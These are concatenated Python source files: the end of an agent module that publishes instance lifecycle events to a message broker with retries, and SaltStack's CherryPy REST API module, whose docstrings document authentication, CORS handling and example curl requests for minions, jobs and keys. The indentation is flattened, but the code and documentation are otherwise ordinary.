health_stat_publishing_enabled = Config.read_property(constants.CEP_PUBLISHER_ENABLED, True)
if health_stat_publishing_enabled:
interval_default = 15 # seconds
interval = Config.read_property("stats.notifier.interval", False)
if interval is not None and len(interval) > 0:
try:
interval = int(interval)
except ValueError:
interval = interval_default
else:
interval = interval_default
health_stats_publisher = healthstats.HealthStatisticsPublisherManager(interval)
log.info("Starting Health statistics publisher with interval %r" % interval)
health_stats_publisher.start()
else:
log.warn("Statistics publisher is disabled")
Config.activated = True
log.info("Health statistics notifier started")
else:
log.error(
"Ports activation timed out. Aborting publishing instance activated event [IPAddress] %s [Ports] %s"
% (listen_address, configuration_ports))
else:
log.warn("Instance already activated")
def publish_maintenance_mode_event():
if not Config.maintenance:
log.info("Publishing instance maintenance mode event...")
service_name = Config.service_name
cluster_id = Config.cluster_id
member_id = Config.member_id
instance_id = Config.instance_id
cluster_instance_id = Config.cluster_instance_id
network_partition_id = Config.network_partition_id
partition_id = Config.partition_id
instance_maintenance_mode_event = InstanceMaintenanceModeEvent(
service_name,
cluster_id,
cluster_instance_id,
member_id,
instance_id,
network_partition_id,
partition_id)
publisher = get_publisher(constants.INSTANCE_STATUS_TOPIC + constants.INSTANCE_MAINTENANCE_MODE_EVENT)
publisher.publish(instance_maintenance_mode_event)
Config.maintenance = True
else:
log.warn("Instance already in a maintenance mode")
def publish_instance_ready_to_shutdown_event():
if not Config.ready_to_shutdown:
log.info("Publishing instance ready to shutdown event...")
service_name = Config.service_name
cluster_id = Config.cluster_id
member_id = Config.member_id
instance_id = Config.instance_id
cluster_instance_id = Config.cluster_instance_id
network_partition_id = Config.network_partition_id
partition_id = Config.partition_id
instance_shutdown_event = InstanceReadyToShutdownEvent(
service_name,
cluster_id,
cluster_instance_id,
member_id,
instance_id,
network_partition_id,
partition_id)
publisher = get_publisher(constants.INSTANCE_STATUS_TOPIC + constants.INSTANCE_READY_TO_SHUTDOWN_EVENT)
publisher.publish(instance_shutdown_event)
Config.ready_to_shutdown = True
else:
log.warn("Instance already in a ReadyToShutDown event...")
def publish_complete_topology_request_event():
complete_topology_request_event = CompleteTopologyRequestEvent()
publisher = get_publisher(constants.INITIALIZER_TOPIC + constants.COMPLETE_TOPOLOGY_REQUEST_EVENT)
publisher.publish(complete_topology_request_event)
def publish_complete_tenant_request_event():
complete_tenant_request_event = CompleteTenantRequestEvent()
publisher = get_publisher(constants.INITIALIZER_TOPIC + constants.COMPLETE_TENANT_REQUEST_EVENT)
publisher.publish(complete_tenant_request_event)
def get_publisher(topic):
if topic not in publishers:
publishers[topic] = EventPublisher(topic)
return publishers[topic]
class EventPublisher(object):
"""
Handles publishing events to topics to the provided message broker
"""
def __init__(self, topic):
self.__topic = topic
self.__log = LogFactory().get_log(__name__)
self.__start_time = int(time.time())
self.__msg_queue = Queue()
def publish(self, event):
if Config.mb_username is None:
auth = None
else:
auth = {"username": Config.mb_username, "password": Config.mb_password}
payload = event.to_json()
retry_iterator = IncrementalCeilingListIterator([2, 2, 5, 5, 10, 10, 20, 20, 30, 30, 40, 40, 50, 50, 60], False)
        # Retry publishing the event until the timeout is exceeded
while int(time.time()) - self.__start_time < (Config.mb_publisher_timeout * 1000):
retry_interval = retry_iterator.get_next_retry_interval()
for mb_url in Config.mb_urls.split(","):
mb_ip, mb_port = mb_url.split(":")
# start a thread to execute publish event
publisher_thread = Thread(target=self.__publish_event, args=(event, mb_ip, mb_port, auth, payload))
publisher_thread.start()
                # give some time for the thread to complete
time.sleep(5)
# check if thread is still running and notify
if publisher_thread.isAlive():
self.__log.debug(
"Event publishing timed out before succeeding. The message broker could be offline.")
# check if publish.single() succeeded
try:
published = self.__msg_queue.get(block=False)
except Empty:
published = False
if published:
return True
# All the brokers on the list were offline
self.__log.debug(
"Could not publish event to any of the provided message brokers. Retrying in %s seconds."
% retry_interval)
time.sleep(retry_interval)
        # Event publisher timeout exceeded
self.__log.warn("Could not publish event to any of the provided message brokers before "
"the timeout [%s] exceeded. The event will be dropped." % Config.mb_publisher_timeout)
return False
def __publish_event(self, event, mb_ip, mb_port, auth, payload):
"""
Publishes the given event to the message broker.
        When a list of message brokers is given, the event is published to the first message broker
        available. The message brokers should therefore share the data (e.g. by sharing the KahaDB in ActiveMQ).
When the event cannot be published, it will be retried until the mb_publisher_timeout is exceeded.
This value is set in the agent.conf.
:param event:
:return: True if the event was published.
"""
try:
self.__log.debug("Publishing [event] %s to %s:%s" % (event.__class__.__name__, mb_ip, mb_port))
publish.single(self.__topic, payload, hostname=mb_ip, port=mb_port, auth=auth)
self.__log.debug("[Event] %s published to MB: %s:%s" % (str(event.__class__.__name__), mb_ip, mb_port))
self.__msg_queue.put(True)
except Exception as err:
self.__log.debug(
"Could not publish [event] %s to message broker %s:%s. : %s"
% (str(event.__class__.__name__), mb_ip, mb_port, err))
self.__msg_queue.put(False)
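# Illustrative sketch (not part of the original source): the retry/back-off shape that
# EventPublisher.publish() follows, expressed with the standard library only. The interval
# list mirrors the one handed to IncrementalCeilingListIterator above; this simplified
# stand-in just repeats the last interval once the list is exhausted.
def _publish_with_retry(send_once, timeout_seconds,
                        intervals=(2, 2, 5, 5, 10, 10, 20, 20, 30, 30, 40, 40, 50, 50, 60)):
    import itertools
    deadline = time.time() + timeout_seconds
    for delay in itertools.chain(intervals, itertools.repeat(intervals[-1])):
        if send_once():  # e.g. a callable wrapping publish.single(...)
            return True
        if time.time() + delay > deadline:
            return False
        time.sleep(delay)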
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends: - CherryPy Python module (strongly recommend 3.2.x versions due to
an as yet unknown SSL error).
- salt-api package
:optdepends: - ws4py Python module for websockets support.
:configuration: All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file
and restart the ``salt-master`` and ``salt-api`` daemons:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution function.
Running this function requires pyOpenSSL and the ``salt-call`` script is
available in the ``salt-minion`` package.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent
requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \
-H 'Accept: application/x-yaml' \
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\
-d client=local \
-d tgt='*' \
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \
-c ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \
-b ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d client=local \
-d tgt='*' \
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
from cherrypy.lib import cpstats
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
            'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
    '''
    A decorator to skip a processor function if process_request_body is False
    '''
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
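# Illustrative sketch (not part of the original source): the normalisation lowdata_fmt
# performs on a urlencoded request. A body such as
#   fun=test.ping&client=local&tgt=*&arg=one
# reaches this tool as a single dict and leaves as a one-element lowstate list with
# 'arg' coerced to a list.
def _lowdata_fmt_example():
    data = {'client': 'local', 'tgt': '*', 'fun': 'test.ping', 'arg': 'one'}
    if not isinstance(data, list):
        if 'arg' in data and not isinstance(data['arg'], list):
            data['arg'] = [data['arg']]
        data = [data]
    return data  # [{'client': 'local', 'tgt': '*', 'fun': 'test.ping', 'arg': ['one']}]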
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
        # if the lowstate loaded isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
                -d fun='test.ping'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
            # Sending positional args and keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
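        # With a jid (hypothetical value '20121130104633606931') the lowstate
        # above holds two chunks, so job_ret_info unpacks into the job return
        # (jobs.lookup_jid) followed by the job metadata (jobs.list_job);
        # without a jid only the jobs.list_jobs result is present.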
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
self._cp_config['tools.salt_token.on'] = True
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
def POST(self, mid, keysize=None, force=None, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
.. versionadded:: 2014.7.0
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
